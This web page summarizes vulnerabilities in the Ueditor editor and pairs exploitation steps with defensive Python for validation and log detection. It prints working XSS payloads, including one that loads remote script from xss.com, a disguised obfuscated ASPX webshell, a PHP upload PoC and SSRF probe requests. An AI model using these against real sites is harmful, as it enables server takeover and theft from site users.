Ueditor Vulnerability Summary
Word count 888 2025-08-09 23:12:49
Ueditor Vulnerability Summary and Exploitation Guide
0x01 Overview
Ueditor is a widely used rich-text editor. Several of its versions carry security vulnerabilities, including XSS, file upload and SSRF issues. This document summarizes the vulnerabilities and exploitation methods for each version.
0x02 XML file upload leading to stored XSS
Affected version: PHP edition v1.4.3.3
Reproduction steps
- Upload an image file
- Intercept the request with BurpSuite
- Modify the parameters:
  - change the uploadimage type to uploadfile
  - change the file extension to .xml
  - insert the XSS payload
Common XSS payloads
<!-- alert popup XSS -->
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script></body></html>
<!-- URL redirect -->
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">window.location.href="https://www.t00ls.net/";</something:script></body></html>
<!-- load remote JS -->
<html><head></head><body><something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml"></something:script></body></html>
Common upload paths
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage
0x03 File upload vulnerabilities
.NET edition file upload vulnerability
Affected versions: 1.4.3.3, 1.5.0 and 1.3.6
Exploiting 1.5.0
POST /ueditor/net/controller.ashx?action=catchimage
source[]=http://x.x.x.x/1.gif?.aspx
Exploiting 1.4.3.3
- Build an HTML form:
<form action="http://target/ueditor/net/controller.ashx?action=catchimage" method="POST">
<input type="text" name="source[]" value="http://x.x.x.x/1.gif?.aspx"/>
<input type="submit"/>
</form>
- Prepare the image webshell (1.gif):
GIF89a<script runat="server" language="JScript">
    function popup(str) {
        var q = "u";
        var w = "afe";
        var a = q + "ns" + w;
        var b = eval(str, a);
        return (b);
    }
</script>
<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>
Exploiting 1.3.6
Use %00 truncation during upload to bypass the check.
PHP edition file upload vulnerability
Exploit PoC:
POST /ueditor/php/action_upload.php?action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/fuck&CONFIG[imageMaxSize]=9999999&CONFIG[imageAllowFiles][]=.php&CONFIG[imageFieldName]=fuck HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryDMmqvK6b3ncX4xxA
--WebKitFormBoundaryDMmqvK6b3ncX4xxA
Content-Disposition: form-data; name="fuck"; filename="fuck.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--WebKitFormBoundaryDMmqvK6b3ncX4xxA--
0x04 SSRF vulnerability
Affected version: JSP edition 1.4.3
Detection method
/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:8080
How to interpret the response
- Remote connection error:
{"state": "SUCCESS", list:[{"state":"\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519"}]}
- Image fetched successfully:
{"state": "SUCCESS", list: [{"state":"SUCCESS","size":"5103","source":"http://192.168.135.133:8080/tomcat.png"}]}
- Host unreachable:
{"state":"SUCCESS", list: [{"state":"\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25"}]}
SSRF in Onethink 1.0
POST /Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
upfile=https://www.google.com/?%23.jpg
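The two catchimage problems above share a root cause: the handler derives the stored extension from the whole URL (so "1.gif?.aspx" is saved as .aspx) and fetches whatever host it is given, including internal ones. The following Python is an example added to this summary, not Ueditor's own code, showing how a remote-image fetch handler can validate a source[] URL and choose a stored filename safely. The allowlist, the magic-byte table, the script-marker heuristic and the injectable resolver stub are all assumptions of the example.

```python
import ipaddress
import os
import secrets
import socket
from urllib.parse import urlsplit

# Example code added to this summary; not Ueditor's own implementation.

ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes ("magic") of the allowed image formats.
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", ".jpg"),
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
)

# Heuristic markers of server-side script embedded after a valid image header
# (the GIF89a<script runat="server"> shell above passes a magic-byte check).
# Markers are kept long to limit false positives on binary image data. The real
# control is that stored files never get an executable extension and the upload
# directory does not execute scripts; this scan is only an extra tripwire.
SCRIPT_MARKERS = (b"<?php", b"<script", b"runat=")


def is_public_ip(ip: str) -> bool:
    """True only for addresses a server should be willing to fetch from."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_remote_source(url: str, resolver=socket.gethostbyname):
    """Decide whether a source[] URL may be fetched. Returns (ok, detail).

    `resolver` maps a hostname to an IPv4 string; it is injectable so the
    check can be exercised offline with a stub (assumption of this example).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    try:
        ip = resolver(parts.hostname)
    except OSError:
        return False, "host does not resolve"
    if not is_public_ip(ip):
        return False, "host resolves to non-public address " + ip
    # The extension comes from the parsed path only; the query string is never
    # part of it, so "http://h/1.gif?.aspx" is judged as ".gif".
    ext = os.path.splitext(parts.path)[1].lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return False, "extension %r not allowed" % ext
    return True, ip


def sniff_image_ext(data: bytes):
    """Return the allowlisted extension matching the content's magic bytes, or None."""
    for magic, ext in IMAGE_MAGIC:
        if data.startswith(magic):
            return ext
    return None


def local_filename_for(url: str, data: bytes) -> str:
    """Name to store fetched content under: random, with the extension taken
    from the content itself and required to agree with the URL's claim."""
    claimed = os.path.splitext(urlsplit(url).path)[1].lower()
    if claimed == ".jpeg":
        claimed = ".jpg"
    sniffed = sniff_image_ext(data)
    if sniffed is None or sniffed != claimed:
        raise ValueError("content does not match the claimed image type")
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise ValueError("image carries embedded script markers")
    # Never reuse the remote name; the requester chose it.
    return secrets.token_hex(16) + sniffed


if __name__ == "__main__":
    # Constructed resolver stub so the demo runs offline.
    stub = {"img.example.com": "93.184.216.34",
            "intranet.example.com": "192.168.135.133"}
    for u in ("http://127.0.0.1:8080",
              "http://img.example.com/1.gif?.aspx",
              "http://intranet.example.com/tomcat.png",
              "http://img.example.com/shell.aspx"):
        print(u, "->", check_remote_source(u, resolver=lambda h: stub.get(h, h)))
```

Two caveats a practitioner should add in a real handler: resolve the host once and connect to that pinned address (otherwise a DNS answer can change between the check and the fetch), and apply the same check to every redirect the fetch follows, since the first URL may be public and the redirect target internal.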
0x05 Another XSS vulnerability
Exploitation
- Enter normal text in the editor
- Intercept the request and modify the content:
%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E
0x06 Mitigation recommendations
- Upgrade to the latest version
- Strictly validate the type and content of uploaded files
- Restrict the remote image fetching feature
- Strictly filter user input
- Set appropriate permissions on the upload directory
Appendix: common paths
Upload paths
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage
/ueditor/net/controller.ashx?action=uploadfile
/ueditor/net/controller.ashx?action=uploadimage
/ueditor/asp/controller.asp?action=uploadfile
/ueditor/asp/controller.asp?action=uploadimage
File listing paths
/ueditor/net/controller.ashx?action=listfile
/ueditor/net/controller.ashx?action=listimage
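The request-level indicators collected in this summary (catchimage probes against internal hosts, an extension smuggled in the query string, CONFIG[...] overrides on action_upload.php, %00 in parameters, listfile/listimage enumeration) can be matched in web server access logs. The Python below is an added detection example, not code from the original page: it classifies requests to the controller paths listed above. The log lines, the endpoint regex and the indicator labels are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Added detection example; not part of the original page or of Ueditor.

# Request part of a combined-format access log line.
LOG_RE = re.compile(r'"(?P<method>GET|POST) (?P<target>\S+) HTTP/1\.[01]"')

# Controller endpoints named in this summary (assumption: default install paths).
CONTROLLER_RE = re.compile(
    r"/ueditor/(?:php|jsp|net|asp)/"
    r"(?:controller\.(?:php|jsp|ashx|asp)|action_upload\.php|getRemoteImage\.php)$")


def non_public_host(host):
    """True if host is 'localhost' or a literal IP outside public space."""
    if not host:
        return True
    if host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope for a log scan
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def indicators(method, target):
    """Return the set of indicator labels for one request line."""
    found = set()
    parts = urlsplit(target)
    if not CONTROLLER_RE.search(parts.path):
        return found
    # Check the raw query before decoding: parse_qsl would turn %00 into NUL.
    if "%00" in parts.query.lower():
        found.add("null-byte-truncation")
    params = parse_qsl(parts.query, keep_blank_values=True)
    action = dict(params).get("action", "")
    for key, value in params:
        if key.startswith("CONFIG["):
            found.add("config-override")
        if key == "source[]":
            src = urlsplit(value)
            if src.scheme not in ("http", "https") or non_public_host(src.hostname):
                found.add("ssrf-probe")
            # "1.gif?.aspx" or "x/?#.jpg": an extension carried outside the path
            if re.fullmatch(r"\.\w+", src.query) or re.fullmatch(r"\.\w+", src.fragment):
                found.add("extension-via-query")
    if action in ("listfile", "listimage"):
        found.add("file-enumeration")
    return found


def scan_log(lines):
    """Return [(request_target, sorted_indicators)] for every flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        tags = indicators(m["method"], m["target"])
        if tags:
            hits.append((m["target"], sorted(tags)))
    return hits


# Constructed sample log lines mirroring the requests described in this summary.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Aug/2025:23:12:49 +0800] "GET /ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:8080 HTTP/1.1" 200 88
203.0.113.5 - - [09/Aug/2025:23:13:02 +0800] "POST /ueditor/net/controller.ashx?action=catchimage&source[]=http://x.x.x.x/1.gif?.aspx HTTP/1.1" 200 140
203.0.113.5 - - [09/Aug/2025:23:13:10 +0800] "POST /ueditor/php/action_upload.php?action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/x&CONFIG[imageAllowFiles][]=.php HTTP/1.1" 200 210
203.0.113.5 - - [09/Aug/2025:23:13:30 +0800] "GET /ueditor/net/controller.ashx?action=listimage&start=0&size=20 HTTP/1.1" 200 512
198.51.100.9 - - [09/Aug/2025:23:14:00 +0800] "GET /ueditor/php/controller.php?action=config HTTP/1.1" 200 1337
198.51.100.9 - - [09/Aug/2025:23:14:05 +0800] "GET /index.html HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for target, tags in scan_log(SAMPLE_LOG.splitlines()):
        print(", ".join(tags), "<-", target)
```

The XML and multipart upload variants are not visible here because their payload travels in the request body, which access logs do not record; for those, the detection point is the upload handler itself (file type and content validation) or a WAF that inspects bodies.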